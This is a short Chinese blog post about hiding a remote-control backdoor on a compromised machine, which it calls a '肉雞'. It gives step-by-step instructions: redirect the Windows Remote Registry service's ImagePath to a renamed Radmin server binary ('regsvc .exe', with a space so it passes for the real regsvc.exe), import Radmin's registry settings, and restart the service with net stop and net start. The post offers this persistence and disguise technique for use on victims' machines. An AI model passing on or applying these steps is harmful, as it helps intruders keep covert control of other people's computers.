用已知服務來隱藏我們自己的服務

以下就拿我們都熟悉的radmin做演示,其他類似！

例如：
Remote Registry服務，他的作用是允許遠程註冊表*作。
（為了肉雞的安全，我們把這個服務修改為我們的後門radmin服務）

他的服務執行文件是：%SystemRoot%\system32\regsvc.exe

他在註冊表裡的地址是：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry

修改右邊的字傳值ImagePath，把：
%SystemRoot%\system32\regsvc.exe

修改為我們的服務程序：
"%SystemRoot%\system32\regsvc .exe" /service
（呵呵，我把r_server.exe該為了regsvc .exe可惜不能覆蓋原文件，注意空格）

好了，把你的radmin的信息註冊表的導入，然後：

net stop RemoteRegistry

net start RemoteRegistry

OK！
 

文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相關日誌: